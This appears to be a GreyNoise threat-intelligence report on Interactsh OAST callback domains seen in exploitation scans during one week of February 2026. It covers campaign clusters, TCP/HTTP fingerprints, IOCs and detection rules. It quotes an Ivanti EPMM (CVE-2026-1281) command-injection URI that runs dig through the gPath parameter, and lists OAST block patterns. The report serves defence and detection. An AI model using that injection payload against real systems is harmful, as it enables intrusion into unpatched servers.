GreyNoise Labs Weekly OAST (Well-known Out-of-band Interaction Domains) Report • Week Ending 2026-02-13

GreyNoise observed 6,197 sessions from 79 unique IPs across 73 Interactsh OAST campaigns targeting the GreyNoise Global Observation Grid between February 7-13, 2026. The activity spans five Interactsh domain variants, involves 100+ distinct CVE exploitation techniques, and reveals coordinated infrastructure across Cloudflare-proxied endpoints, Oracle Cloud, PROSPERO OOO, and Vietnamese hosting providers.
OAST
MCP
projectdiscovery
interactsh
rce
iocs
detection engineering
cybersecurity
Author

🔮Orbie✨

Published

February 15, 2026

Overview

OAST domains appeared across multiple HTTP fields: request bodies (4,331 occurrences, 52.8%), URI paths (1,709, 20.8%), request header values (1,272, 15.5%), URL paths (392, 4.8%), cookies (383, 4.7%), and user-agent strings (122, 1.5%). The distribution across multiple injection vectors indicates automated vulnerability scanning toolkits that embed callback domains into every exploitable parameter.

Five Interactsh domain variants were observed: oast.pro (4,182 occurrences across 22 campaigns), oast.live (1,970, 21 campaigns), oast.fun (857, 16 campaigns), oast.me (767, 11 campaigns), and oast.site (433, 13 campaigns). All domains used the standard Interactsh encoding format with campaign, machine_id, PID, and nonce fields.

JA4T TCP fingerprint analysis (sourced from raw session data) identified three dominant infrastructure clusters: a Cloudflare proxy signature (MSS 1380, 2,973 sessions), a standard Linux stack (MSS 1460, 1,124 sessions), and an anomalous localhost-like signature (MSS 65495, 1,276 sessions across two window size variants) characteristic of Nuclei and similar scanning frameworks.

NOTE: This edition contains a supplemental deep-dive into selected OAST infrastructure components section.

Temporal Analysis

Activity peaked during the first two days of the observation window, then declined:

Day OAST Count Sessions Unique IPs
Feb 7 2,757 2,233 18
Feb 8 2,045 1,765 20
Feb 9 566 373 16
Feb 10 1,016 562 37
Feb 11 1,011 781 16
Feb 12 553 362 6
Feb 13 261 121 11

The Feb 7-8 peak corresponds to the dominant ibe4q campaign (Cloudflare-proxied infrastructure). February 10 saw a spike in unique IPs (37) despite moderate session volume, indicating new scanner infrastructure rotating in. Burst analysis identified concentrated activity windows at Feb 8 16:00-17:00 UTC (330+323 sessions) and Feb 11 20:00 UTC (258 sessions), both associated with Oracle Cloud-based scanning.

Campaign Analysis

The 73 campaigns cluster into distinct operational groups based on infrastructure, timing, and payload overlap.

Campaign Group 1: Cloudflare-Proxied Scanning (ibe4q, bjibe)

The largest campaign cluster, ibe4q, generated 3,157 OAST domain occurrences across 2,759 sessions from 9 Cloudflare-proxied IPs (AS13335), all geolocated to Brazil. Activity ran from Feb 7 00:00 UTC through Feb 9 05:35 UTC. A related campaign bjibe (238 occurrences, 202 sessions, 8 IPs) operated concurrently from Feb 7-8. Both campaigns share the same machine_id and use all six OAST injection vectors (requestBody, uri, path, requestCookie, requestHeaderValue, useragent), indicating a comprehensive vulnerability scanning toolkit.

Top IPs: 104.28.193.87 (1,158 sessions), 104.28.193.83 (418), 104.28.193.82 (379), 104.28.193.84 (277), 104.28.225.85 (262).

JA4T fingerprint: 65535_2-4-8-1-3_1380_13 (uniform across all 9 IPs). The MSS 1380 confirms Cloudflare tunnel/proxy traversal. The Cloudflare proxy masks the true origin infrastructure. The Brazilian geolocation likely reflects Cloudflare edge selection rather than attacker location.

Campaign Group 2: Oracle Cloud Multi-Campaign Scanners

Four Oracle Corporation IPs (AS31898) operated across 13 campaigns with 1,243 total sessions:

IP Country Campaigns Sessions Active Period
204.216.147.144 Brazil 5 (37d6c, b7d6c, fhr7d, j7d6c, r7d6c) 591 Feb 8-11
147.224.178.225 United States 4 (3fk04, gt3fk, jfk04, rfk04) 365 Feb 10-11
168.107.59.85 South Korea 1 (c9ndh) 198 Feb 12
144.24.88.37 South Korea 3 (3grt7, 3t7nn, rt7nn) 89 Feb 8-10

GreyNoise first observed 204.216.147.144 on 2024-09-10 (35,367 total hits across 8 sensors), indicating established scanning infrastructure. IP 147.224.178.225 first appeared 2026-02-01 (23,109 hits, 10 sensors) and carries GreyNoise tags for both CVE-2026-1281 (Ivanti EPMM) and CVE-2026-0770. All Oracle IPs used path, requestBody, requestCookie, requestHeaderValue, and uri injection vectors – the broadest payload diversity observed.

JA4T fingerprint: Primarily 64240_2-4-8-1-3_1460_7 (standard Linux), consistent across 204.216.147.144, 168.107.59.85, and 144.24.88.37. However, 147.224.178.225 uses both the standard Linux fingerprint (132 sessions) and the Nuclei/loopback fingerprint 65495_2-4-8-1-3_65495_7 (233 sessions), indicating dual-tool deployment – possibly a standard scanner plus Nuclei on the same host.

Campaign Group 3: Private Layer / Switzerland (7gveu)

A single IP, 179.43.146.42 (AS51852, Private Layer INC, Switzerland), generated 511 OAST domains across 456 sessions in campaign 7gveu, active throughout the entire observation window (Feb 7-13). GreyNoise first observed this IP on 2026-02-03 (43,110 hits across 38 sensors). The sustained, continuous scanning pattern across 7 days suggests automated, unattended operation. All six injection vectors were used.

JA4T fingerprint: Primarily 32120_2-4-8-1-3_1460_7 (350 sessions) – a non-standard TCP window size of 32120 that serves as a strong single-actor indicator. This IP also exhibited 65495_2-4-8-1-3_65495_7 (106 sessions), indicating it runs Nuclei alongside a custom scanning tool with a distinctive TCP stack.

Campaign Group 4: PROSPERO OOO / Ivanti EPMM Exploitation (f984d, il84d, ito4d, fbg4d)

IP 193.24.123.42 (AS200593, PROSPERO OOO, Russia) operated 4 campaigns with 169 sessions between Feb 7-8. This IP stands out for exclusive exploitation of CVE-2026-1281 (Ivanti Endpoint Manager Mobile Code Injection). URI analysis reveals a specific exploit pattern targeting the Ivanti EPMM app store endpoint:

/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue,et=1770526185,
h=gPath[`dig <OAST_DOMAIN> > /dev/null`]/39IUqFPJtv5RscnibeX4OUpsHTa.ipa

The payload injects a dig command via the gPath parameter to trigger DNS callbacks to OAST domains, confirming command execution. Target IPs in the 38.48.0.0/24 range (GreyNoise sensor space) were systematically enumerated. OAST domains were found only in path and uri fields, consistent with this specific exploit vector.

JA4T fingerprint: 65495_2-4-8-1-3_65495_7 (166 sessions) with a secondary 33280_2-4-8-1-3_65495_7 (3 sessions). The MSS 65495 confirms Nuclei-based tooling, consistent with the Interactsh OAST integration.

GreyNoise has tracked this IP since 2025-06-12 (147,752 total hits across 2,770 sensors). One additional IP, from AS215730, also triggered the CVE-2026-1281 tag via campaign hag80.

Campaign Group 5: AS215540 / GCS LLP (ka1vu, geka1)

IP 46.29.235.157 (AS215540, GLOBAL CONNECTIVITY SOLUTIONS LLP, Netherlands) ran 2 campaigns with 287 sessions between Feb 8-9. GreyNoise first observed this IP on 2026-02-08 (9,881 hits, 6 sensors) – appearing in GreyNoise records at the same time as this observation window. The IP shares JA3 fingerprint 11a384388ad36777e1a2e121495037fe with two other IPs (45.138.101.232 and 37.60.230.90), suggesting common scanning tooling.

JA4T analysis reveals three distinct TCP fingerprints from this single IP: 64240_2-1-3-1-1-4_1400_8 (165 sessions, primary), 65495_2-4-8-1-3_65495_7 (69 sessions), and 33280_2-4-8-1-3_65495_7 (25 sessions). The primary fingerprint uses non-standard TCP option ordering (2-1-3-1-1-4 vs the Linux default 2-4-8-1-3) and MSS 1400, consistent with a VPN or WireGuard tunnel. The two secondary fingerprints (MSS 65495) indicate concurrent Nuclei deployment. This IP runs at least two distinct scanning tools through different network paths.

Campaign Group 6: Vietnamese Infrastructure (p7a5r, 97a5r, mt4kp)

Two Vietnamese hosting providers contributed 375 sessions:

  • 103.144.87.192 (AS135932, Viet Storage): campaigns p7a5r and 97a5r, 264 sessions, Feb 9-13. Generated 1,177 unique OAST domains across only 264 sessions – the highest domain-to-session ratio observed, indicating payload reuse or multi-vector injection per session.
  • 103.252.93.81 (AS135918, Viet Digital): campaign mt4kp, 111 sessions, Feb 9-10. OAST domains embedded exclusively in requestBody, consistent with Log4j/deserialization-focused exploitation.

Campaign Group 7: Estonian Infrastructure (asgsb)

IP 45.138.101.232 (AS41745, Baykov Ilya Sergeevich, Estonia) ran campaign asgsb with 130 sessions on Feb 11. GreyNoise first observed this IP on 2026-02-11 (10,524 hits, 6 sensors) – brand new infrastructure. Shares the JA3 fingerprint with the AS215540 and Contabo IPs.

JA4T fingerprint: 64860_2-4-8-1-3_1380_7. The MSS 1380 matches the Cloudflare cluster’s tunnel signature, but the window size (64860) and TTL (7) differ from Cloudflare’s 65535..13. This suggests a different tunnel provider or VPN with similar MTU constraints. The unique JA4T, combined with the shared JA3, indicates the same TLS-layer scanner tool deployed behind a different network tunnel than the AS215540 and Contabo nodes.

Payload Analysis

GreyNoise tags identified 100+ distinct CVE exploitation techniques across the session data. The top exploitation categories:

Category Tag Occurrences Unique IPs
Log4j RCE Apache Log4j RCE Attempt 2,131 26
Linux Command Injection Generic Suspicious Linux Command in Request 1,703 54
Ivanti EPMM CVE-2026-1281 RCE Attempt 344 2
XSS Probing Generic XSS Commands in Request 320 25
Fastjson RCE Fastjson RCE Attempt 305 19
Path Traversal Generic Path Traversal Attempt 178 18
Apache OFBiz CVE-2024-32113 Path Traversal 135 7
Apache OFBiz Authentication Bypass Attempt 123 6
Cisco HyperFlex HX RCE Vuln Check 114 30
GPON Router CVE-2018-10561 Router Worm 114 10
XStream RCE Generic XStream RCE Attempt 88 19
Atlassian Confluence CVE-2022-26134 OGNL Injection 78 7
Spring Cloud Gateway Code Injection 73 12
XStream CVE-2021-39152 Input Stream 66 10

Notable CVE targets by recency:

  • CVE-2026-1281 (Ivanti EPMM Code Injection): 344 occurrences, 2 IPs – active exploitation of a 2026 vulnerability
  • CVE-2026-0770: Tagged on IP 147.224.178.225 (Oracle Cloud)
  • CVE-2025-4123 (Grafana Path Traversal XSS): 44 occurrences, 8 IPs
  • CVE-2025-2777/2775/2776 (SysAid On-Prem XXE): 21 occurrences each, 6 IPs
  • CVE-2025-34028 (Commvault Command Center RCE): 21 occurrences, 6 IPs
  • CVE-2025-8943 (Flowise Authentication Bypass RCE): 18 occurrences, 5 IPs
  • CVE-2025-8085 (Ditty WordPress Plugin): 15 occurrences, 3 IPs

The payload arsenal spans enterprise software (Oracle WebLogic, SAP, Atlassian, Adobe ColdFusion), network appliances (Cisco, Sophos, Palo Alto, Draytek), IoT/consumer devices (GPON, WAVLINK, D-Link, LG), and emerging AI/ML infrastructure (Ollama, Flowise, Anyscale Ray).

Infrastructure Analysis

JA4T TCP Fingerprint Clustering

JA4T fingerprints extracted from raw session data reveal three distinct TCP stack clusters accounting for 98.6% of OAST sessions:

JA4T Fingerprint Window MSS TTL Sessions IPs ASNs Interpretation
65535_2-4-8-1-3_1380_13 65535 1380 13 2,973 9 1 Cloudflare proxy/tunnel
64240_2-4-8-1-3_1460_7 64240 1460 7 1,124 18 10 Standard Linux (cloud VPS)
65495_2-4-8-1-3_65495_7 65495 65495 7 1,082 26 22 Nuclei/loopback scanning
32120_2-4-8-1-3_1460_7 32120 1460 7 350 1 1 Private Layer (custom stack)
33280_2-4-8-1-3_65495_7 33280 65495 7 194 8 8 Nuclei variant (alt window)
64240_2-1-3-1-1-4_1400_8 64240 1400 8 193 1 1 AS215540 primary tool
64860_2-4-8-1-3_1380_7 64860 1380 7 130 1 1 Estonian scanner (tunnel)

Cluster 1 – Cloudflare Proxy (MSS 1380, 2,973 sessions): The fingerprint 65535_2-4-8-1-3_1380_13 is exclusive to AS13335 (Cloudflare). The MSS 1380 value (20 bytes below the standard 1400 for tunneled traffic) confirms these sessions traverse a Cloudflare tunnel or Workers proxy. The maximum window size (65535) and TTL of 13 (initial TTL 64 minus ~51 hops through proxy infrastructure) are consistent with Cloudflare’s edge network. All 9 IPs in the 104.28.193.x and 104.28.225.x ranges share this identical fingerprint.

Cluster 2 – Standard Linux VPS (MSS 1460, 1,124 sessions): The fingerprint 64240_2-4-8-1-3_1460_7 represents a default Linux TCP stack (window 64240, standard Ethernet MSS 1460, TTL 7 = initial 64 minus ~57 hops). This cluster spans 18 IPs across 10 ASNs including Oracle (AS31898), Contabo (AS51167), and DigitalOcean (AS14061). Key IPs: 204.216.147.144 (Oracle, 591 sessions), 168.107.59.85 (Oracle, 198 sessions), 144.24.88.37 (Oracle, 89 sessions), 37.60.230.90 (Contabo, 87 sessions). The Oracle Cloud IPs all share this fingerprint, supporting their grouping as a single operational cluster.

Cluster 3 – Nuclei/Loopback Scanner (MSS 65495, 1,276 sessions): Two fingerprint variants share the anomalous MSS value of 65495: 65495_2-4-8-1-3_65495_7 (1,082 sessions, 26 IPs) and 33280_2-4-8-1-3_65495_7 (194 sessions, 8 IPs). MSS 65495 is the Linux loopback interface MSS (65535 minus 40 bytes TCP/IP overhead), indicating the scanning tool binds to a loopback address or uses a local proxy before egressing. This is a known signature of Nuclei and Interactsh-integrated scanning frameworks. The cluster spans 22 ASNs across 14 countries – the widest geographic distribution of any fingerprint – consistent with a widely deployed open-source tool.

Notable MSS 65495 users:

  • 147.224.178.225 (Oracle, US): 233 sessions – uses both standard Linux and Nuclei fingerprints across different campaigns
  • 193.24.123.42 (PROSPERO, Russia): 166 sessions – Ivanti EPMM exploitation
  • 103.144.87.192 (Viet Storage): 135 sessions with MSS 65495, plus 129 sessions with window 33280 variant
  • 179.43.146.42 (Private Layer): 106 sessions (secondary fingerprint alongside its primary 32120 stack)
  • Tor exit nodes (Emerald Onion, Stiftung Erneuerbare Freiheit): tau2 campaigns

Multi-Fingerprint IPs: Twelve IPs exhibited multiple JA4T fingerprints, indicating either multiple scanning tools or configuration changes during operation. The most notable is 46.29.235.157 (AS215540) with three distinct fingerprints: 64240_2-1-3-1-1-4_1400_8 (165 sessions, primary tool), 65495_2-4-8-1-3_65495_7 (69 sessions, Nuclei), and 33280_2-4-8-1-3_65495_7 (25 sessions, Nuclei variant). The primary fingerprint uses non-standard TCP options (2-1-3-1-1-4 vs the typical 2-4-8-1-3) and MSS 1400, suggesting a VPN or tunnel endpoint.

JA4T + JA4H Combined Clustering

Cross-referencing TCP and HTTP fingerprints identifies the tightest infrastructure groupings:

JA4T JA4H Sessions IPs ASNs Assessment
65535..1380_13 po11nn06..4ea4093e6290 997 9 1 Cloudflare cluster, POST w/ 6 headers
64240..1460_7 po11nn06..4ea4093e6290 330 5 2 Linux VPS, same HTTP toolkit
65535..1380_13 ge11nn04..532a1ee47909 310 9 1 Cloudflare cluster, GET w/ 4 headers
65495..65495_7 ge11nn04..532a1ee47909 282 14 12 Nuclei, GET variant
65495..65495_7 po11nn06..4ea4093e6290 279 11 11 Nuclei, POST variant

The Cloudflare proxy cluster uses both POST-heavy (po11nn06) and GET-heavy (ge11nn04) HTTP patterns but shares a single JA4T fingerprint, confirming a unified origin behind the proxy. The Nuclei cluster uses the same HTTP fingerprint variants but from 22+ different ASNs – the HTTP toolkit is shared but the TCP signature betrays the loopback scanning architecture.

Tor Exit Node Cluster (tau2 campaigns)

The tau2 campaign family (atau2, itau2, 2tau2, qtau2) operated across 23 sessions from privacy-focused infrastructure:

ASN Organization IPs Sessions JA4T Fingerprints
AS60729 Stiftung Erneuerbare Freiheit 3 4 3 distinct
AS396507 Emerald Onion 3 4 3 distinct
AS214503 QuxLabs AB 2 2 2 distinct
AS210558 1337 Services GmbH 2 2 2 distinct
AS208323 Foundation for Applied Privacy 2 2 1 distinct
AS215125 Church of Cyberology 2 2 2 distinct
AS399629 BL Networks 1 3 2 distinct
AS214209 Internet Magnate (Pty) Ltd 2 3 2 distinct

All are known Tor exit node operators or privacy-focused hosting providers. The multiple JA4T fingerprints per ASN reflect the heterogeneous nature of Tor exit infrastructure (each exit node has its own TCP stack). Low session counts per IP (1-2) are consistent with Tor circuit rotation. The tau2 campaigns use MSS 65495 (Nuclei), standard 1460 (Linux), and 1436/1452 (VPN tunnels), indicating the scanning tool runs behind Tor with varying exit paths.

JA4H HTTP Fingerprint Clustering

The top JA4H fingerprints span multiple JA4T clusters, confirming shared HTTP-layer tooling across distinct network-layer infrastructure:

JA4H Fingerprint Unique IPs ASNs Occurrences
po11nn060000_4ea4093e6290 28 16 1,933
ge11nn040000_532a1ee47909 36 18 828
po11nn08en00_9cf61e78b7a7 22 11 449
po11nn060000_da66f5d9ff4c 16 10 243
po11nr070000_6b557635aee2 18 7 223

The dominant fingerprint po11nn060000_4ea4093e6290 appeared across 28 IPs in 16 ASNs spanning 12 countries. The po11 prefix indicates HTTP/1.1 POST requests with no cookies or referer. This distribution is consistent with widely deployed scanning tooling (Nuclei or similar frameworks).

One JA4H fingerprint, ge11nr17${jn_8062e975b6e7, contains a JNDI injection fragment in the hash – the ${jn prefix indicates Log4j payloads embedded in HTTP headers that propagated into the fingerprint computation. This appeared across 13 IPs in 8 ASNs.

Shared JA3 Fingerprint Cluster

Three IPs share JA3 fingerprint 11a384388ad36777e1a2e121495037fe:

IP ASN Country First Seen Sessions JA4T
46.29.235.157 AS215540 (GCS LLP) Netherlands 2026-02-08 287 3 distinct
45.138.101.232 AS41745 (Baykov) Estonia 2026-02-11 132 64860..1380_7
37.60.230.90 AS51167 (Contabo) France 2026-01-12 87 64240..1460_7

All three IPs appeared in GreyNoise records within the past 5 weeks. The shared JA3 fingerprint across three distinct ASNs suggests a common TLS library and configuration. Despite sharing JA3, their JA4T fingerprints differ: AS215540 uses three TCP stacks (including the unusual 2-1-3-1-1-4 option ordering), Estonia uses MSS 1380 (tunnel), and Contabo uses standard Linux. This indicates the same application-layer tool deployed across different network configurations.

ASN Distribution

ASN Organization Sessions IPs Campaigns
AS13335 Cloudflare, Inc. 2,987 20 5
AS31898 Oracle Corporation 1,243 4 13
AS51852 Private Layer INC 456 1 1
AS215540 Global Connectivity Solutions LLP 287 1 2
AS135932 Viet Storage 264 1 2
AS200593 PROSPERO OOO 169 1 4
AS41745 Baykov Ilya Sergeevich 132 1 1
AS135918 Viet Digital Technology 111 1 1
AS14061 DigitalOcean, LLC 91 9 11
AS51167 Contabo GmbH 87 1 5

PROSPERO OOO (AS200593) is a hosting provider with a documented history of enabling malicious activity. The combination of PROSPERO hosting and exclusive CVE-2026-1281 exploitation represents the most operationally distinct cluster in this dataset.

Attribution Assessment

Confidence: Low-Medium

The data supports identification of distinct operational clusters but not definitive attribution to specific threat actors.

What the data shows:

  • At least 5-7 operationally distinct groups based on infrastructure, campaign patterns, and payload focus
  • JA4T fingerprinting strengthens cluster boundaries: three TCP stack families (Cloudflare MSS 1380, standard Linux MSS 1460, Nuclei MSS 65495) cleanly partition the dataset
  • The PROSPERO/Ivanti EPMM cluster is the most clearly differentiated, with exclusive focus on CVE-2026-1281 and a specific dig-based command injection payload, running Nuclei (MSS 65495)
  • Oracle Cloud IPs operate the broadest vulnerability scanning toolkit across the most campaigns (13), with a consistent standard Linux TCP stack (64240_2-4-8-1-3_1460_7), suggesting a scanning-as-a-service or bug bounty automation platform
  • The shared JA3 fingerprint across AS215540/AS41745/Contabo points to common TLS tooling, but divergent JA4T fingerprints reveal different network-layer configurations (VPN tunnel, tunnel MSS 1380, standard Linux)
  • Private Layer IP 179.43.146.42 has a unique JA4T window size (32120) that serves as a high-confidence single-actor tracking identifier
  • 12 IPs exhibited multiple JA4T fingerprints, indicating dual-tool deployment (typically a primary scanner + Nuclei)
  • Cloudflare-proxied infrastructure has a uniform JA4T (65535_2-4-8-1-3_1380_13 across all 9 IPs), consistent with a single origin behind the proxy

What remains unknown:

  • Whether the Cloudflare-proxied traffic represents one actor or multiple actors behind a shared proxy (the uniform JA4T suggests a single origin, but Cloudflare normalizes TCP characteristics)
  • The relationship, if any, between Oracle Cloud campaigns (campaign IDs share partial suffixes like 7d6c and fk04, suggesting sequential tool runs from the same operator; uniform JA4T supports single-operator hypothesis)
  • Whether Vietnamese infrastructure represents independent operators or a shared hosting platform (both IPs use MSS 65495 Nuclei fingerprints but with different window sizes, suggesting different host configurations)

Network IOCs

Primary IPs (by session volume):

IP ASN Country Sessions Campaigns GreyNoise Classification
104.28.193.87 AS13335 Brazil 1,158 3 Malicious
204.216.147.144 AS31898 Brazil 591 5 Malicious
179.43.146.42 AS51852 Switzerland 456 1 Malicious
104.28.193.83 AS13335 Brazil 418 2 Malicious
104.28.193.82 AS13335 Brazil 379 2 Malicious
147.224.178.225 AS31898 United States 365 4 Malicious
46.29.235.157 AS215540 Netherlands 287 2 Malicious
103.144.87.192 AS135932 Vietnam 264 2 Malicious
193.24.123.42 AS200593 Russia 169 4 Malicious
45.138.101.232 AS41745 Estonia 132 1 Malicious
103.252.93.81 AS135918 Vietnam 111 1 Malicious
168.107.59.85 AS31898 South Korea 198 1 Malicious
37.60.230.90 AS51167 France 87 5 Malicious

OAST Domains/Providers:

All domains use the Interactsh OAST platform across five TLDs:

  • *.oast.pro (4,182 occurrences, 22 campaigns)
  • *.oast.live (1,970, 21 campaigns)
  • *.oast.fun (857, 16 campaigns)
  • *.oast.me (767, 11 campaigns)
  • *.oast.site (433, 13 campaigns)

JA4T TCP Fingerprints (for detection):

  • 65535_2-4-8-1-3_1380_13 – Cloudflare proxy cluster (2,973 sessions, 9 IPs)
  • 65495_2-4-8-1-3_65495_7 – Nuclei/loopback scanner (1,082 sessions, 26 IPs, 22 ASNs)
  • 33280_2-4-8-1-3_65495_7 – Nuclei variant (194 sessions, 8 IPs)
  • 32120_2-4-8-1-3_1460_7 – Private Layer custom stack (350 sessions, 1 IP)
  • 64240_2-1-3-1-1-4_1400_8 – AS215540 VPN/tunnel tool (193 sessions, 1 IP)
  • 64860_2-4-8-1-3_1380_7 – Estonian tunnel scanner (130 sessions, 1 IP)

JA4H HTTP Fingerprints (for detection):

  • po11nn060000_4ea4093e6290_000000000000_000000000000 (1,933 occurrences)
  • ge11nn040000_532a1ee47909_000000000000_000000000000 (828 occurrences)
  • po11nn08en00_9cf61e78b7a7_000000000000_000000000000 (449 occurrences)

Shared JA3 Fingerprint:

  • 11a384388ad36777e1a2e121495037fe (used by 46.29.235.157, 45.138.101.232, 37.60.230.90)

Detection Recommendations

  1. Block or alert on PROSPERO OOO infrastructure (AS200593, specifically 193.24.123.42) – this ASN has a documented history of hosting malicious operations and was observed exclusively targeting CVE-2026-1281.
  2. Prioritize patching for CVE-2026-1281 (Ivanti Endpoint Manager Mobile Code Injection) – active exploitation observed with functional dig-based command injection payloads targeting the /mifs/c/appstore/fob/ endpoint.
  3. Monitor for Interactsh callback domains (*.oast.pro, *.oast.live, *.oast.fun, *.oast.me, *.oast.site) in DNS logs, HTTP request bodies, URI paths, cookies, headers, and user-agent strings.
  4. Alert on the shared JA3 fingerprint 11a384388ad36777e1a2e121495037fe associated with the coordinated scanning cluster across AS215540, AS41745, and Contabo.
  5. Detect Nuclei-based scanning via JA4T – MSS 65495 (fingerprints 65495_2-4-8-1-3_65495_7 and 33280_2-4-8-1-3_65495_7) is a high-fidelity indicator of loopback-proxied scanning tools. This signature accounted for 1,276 sessions (20.6%) across 26 IPs and 22 ASNs.
  6. Track the Private Layer custom TCP stack – JA4T 32120_2-4-8-1-3_1460_7 (window 32120) is unique to IP 179.43.146.42 and provides a single-actor tracking fingerprint for this sustained 7-day scanner.
  7. Review exposure to 2025-2026 CVEs actively targeted: CVE-2025-4123 (Grafana), CVE-2025-2775/2776/2777 (SysAid), CVE-2025-34028 (Commvault), CVE-2025-8943 (Flowise), CVE-2025-61882 (Oracle E-Business Suite).
  8. WAF rules: Block requests containing oast.pro, oast.live, oast.fun, oast.me, oast.site in any HTTP field. These domains have no legitimate use in production traffic.
  9. Monitor Oracle Cloud ranges (AS31898) for broad vulnerability scanning – 4 IPs operated 13 campaigns across 3 countries, using standard Linux TCP stacks (64240_2-4-8-1-3_1460_7).

GNQL Queries

Sessions containing OAST callback domains in the past 7 days:

tags:"Contains Well-known Out-of-band Interaction Domain" last_seen:7d

PROSPERO OOO infrastructure (Ivanti EPMM exploitation):

metadata.asn:AS200593 last_seen:7d

Oracle Cloud scanning infrastructure:

metadata.asn:AS31898 last_seen:7d tags:"Contains Well-known Out-of-band Interaction Domain"

Shared JA3 cluster:

raw_data.ja3.fingerprint:11a384388ad36777e1a2e121495037fe last_seen:7d

CVE-2026-1281 exploitation:

tags:"Ivanti Endpoint Manager Mobile Code Injection CVE-2026-1281 RCE Attempt" last_seen:7d

AS215540 (new scanning infrastructure):

metadata.asn:AS215540 last_seen:7d

Supplemental Threat Intelligence Enrichment For Selected OAST Infrastructure

VirusTotal + Censys

This section layers external threat intelligence from Censys & VirusTotal onto key IPs from the OAST report.

193.24.123.42 (PROSPERO OOO, Russia) - Ivanti EPMM Attacker

VirusTotal Classification:

  • 14% malicious detection rate (13/93 engines)
  • Community reputation: 0 (neutral, no votes)
  • Self-signed certificate for www.vvork.com (Hestia Control Panel)
  • Certificate validity: 2025-07-08 to 2026-07-08
  • 2 downloaded files observed (HTML, index.html)

Censys Infrastructure:

  • BULLETPROOF hosting label (confidence: 0.75) – Censys classifies this as bulletproof infrastructure resistant to takedown
  • Location: St. Petersburg, Russia (59.9386°N, 30.3141°E)
  • Only 1 service exposed: Port 111 (PORTMAP/TCP)
  • Network creation: 2024-07-03 (recent allocation)
  • WHOIS: PROSPERO OOO, PR-CT SOLIDARITY, D. 12 K. 2 LITERA Z, KV. 167, 193312, ST. PETERSBURG
  • Abuse contact: mail@pro-spero.ru

Key Findings:

  • The bulletproof hosting label combined with exclusive CVE-2026-1281 exploitation suggests this is purpose-built attack infrastructure
  • Minimal exposed attack surface (only PORTMAP) indicates operational security awareness
  • Self-signed certificate and Hestia Control Panel suggest web hosting management interface
  • Network registered 6 months before OAST observation window

Detection Priority: CRITICAL – bulletproof infrastructure actively exploiting 2026 vulnerabilities

204.216.147.144 (Oracle Corporation, Brazil)

VirusTotal Classification:

  • 4.3% malicious detection rate (4/93 engines), 1.1% suspicious (1/93)
  • Community reputation: -1 (1 malicious vote)
  • Resolves to vamflix.ddns.net (dynamic DNS, suspicious)
  • 2 downloaded files: APK Easy Tool v1.60 Portable.zip, light-skin-3.png

Censys Infrastructure:

  • Oracle Cloud (AS31898), SĂŁo Paulo, Brazil
  • No detailed Censys scan available (Oracle Cloud may block external scans)

Key Findings:

  • DDNS resolution (vamflix.ddns.net) indicates dynamic/residential IP rotation or home-hosted infrastructure on Oracle Cloud
  • Community malicious vote suggests prior abuse reports
  • 591 OAST sessions across 5 campaigns with broadest payload diversity
  • GreyNoise first observed 2024-09-10 (35,367 total hits, 8 sensors) – established scanning infrastructure

Detection Priority: HIGH – Oracle Cloud abuse, established malicious history

179.43.146.42 (Private Layer INC, Switzerland)

VirusTotal Classification:

  • 2.2% malicious detection rate (2/93)
  • Community reputation: -1 (1 malicious vote)
  • Certificate for dns.nullsproxy.com (Gandi CA)
  • 5 domain resolutions (all suspicious):
    • aliyundunupdate.xyz (last resolved 2026-02-08) – impersonates Alibaba Cloud security update domain
    • dns.nullsproxy.com
    • lonatersency.com (2015)
    • billerma.com (2015)
    • palablersdown.com (2015)
  • JARM hash: 2ad2ad0002ad2ad00042d42d0000005d86ccb1a0567e012264097a0315d7a7
  • URLs observed: http://aliyundunupdate.xyz:8084/slt, http://aliyundunupdate.xyz:8084/

Censys Infrastructure:

  • BULLETPROOF hosting label (confidence: 0.75)
  • Location: Bellinzona, Switzerland (registered country: Panama)
  • Reverse DNS: hostedby.privatelayer.com
  • OS: Debian Linux with OpenSSH 10.2p1
  • 4 exposed services:
    1. SSH (22): OpenSSH 10.2p1 Debian-3
    2. HTTP (8082): Basic auth protected (“Authorization Required”)
    3. HTTP (8084): nginx default welcome page – likely C2 or malware distribution
    4. HTTP (8089): Basic auth protected (“Restricted”)
  • JA4T fingerprint (Censys scan): 31856_2-4-8-1-3_1460_7 – standard Debian TCP stack
    • NOTE: Our OAST sessions showed JA4T 32120_2-4-8-1-3_1460_7 (window 32120) – this indicates the scanning tool uses a custom TCP stack modification, not the host’s default stack

Key Findings:

  • The aliyundunupdate.xyz domain is a typosquat impersonating Alibaba Cloud (legitimate: aliyundun.com)
  • Multiple historical suspicious domains suggest long-term malicious hosting
  • Nginx default page on port 8084 with no customization indicates rapid deployment
  • Unique TCP window size (32120) is a high-confidence fingerprint for tracking this actor across different IPs
  • Sustained 7-day scanning (Feb 7-13) with 456 sessions indicates automated, unattended operation
  • GreyNoise: 43,110 hits across 38 sensors since 2026-02-03

Detection Priority: HIGH – bulletproof infrastructure with C2 characteristics and typosquatting

46.29.235.157 (AS215540, Global Connectivity Solutions LLP)

VirusTotal Classification:

  • 1.1% malicious detection rate (1/93 engines)
  • 98.9% undetected (92/93)
  • No domain resolutions or SSL certificates in VirusTotal
  • Community reputation: 0

Censys Infrastructure:

  • Location: Amsterdam, Netherlands (NOT Denmark as initially reported)
  • Reverse DNS: 40735.ip-ptr.tech
  • OS: pfSense FreeBSD firewall/router
  • 1 exposed service:
    • HTTPS (443): pfSense web GUI login page
    • Self-signed certificate: “pfSense GUI default Self-Signed Certificate”
    • Certificate CN: pfSense-697f5f3d024f3
    • nginx frontend with PHP backend (PHPSESSID cookie)
    • favicon hash: 5567e9ce23e5549e0fcd7195f3882816 (pfSense default)
    • HTML title: “pfSense - Login”
  • JA4T fingerprint (Censys scan): 65228_2-1-3-4-8_1460_7
    • TCP options: 2-1-3-4-8 – non-standard ordering (default Linux: 2-4-8-1-3)
    • This matches one of our observed fingerprints (64240_2-1-3-1-1-4_1400_8) with similar non-standard option ordering
  • WHOIS created: 2023-05-10

Key Findings:

  • pfSense firewall suggests this is a router/VPN endpoint for scanning operations, not an end host
  • The self-signed pfSense certificate (default install) indicates minimal operational security
  • Non-standard TCP option ordering (2-1-3-4-8) is a VPN/tunnel artifact – likely WireGuard or similar
  • Our OAST sessions showed 3 distinct JA4T fingerprints from this IP:
    1. 64240_2-1-3-1-1-4_1400_8 (165 sessions) – primary tool through VPN
    2. 65495_2-4-8-1-3_65495_7 (69 sessions) – Nuclei
    3. 33280_2-4-8-1-3_65495_7 (25 sessions) – Nuclei variant
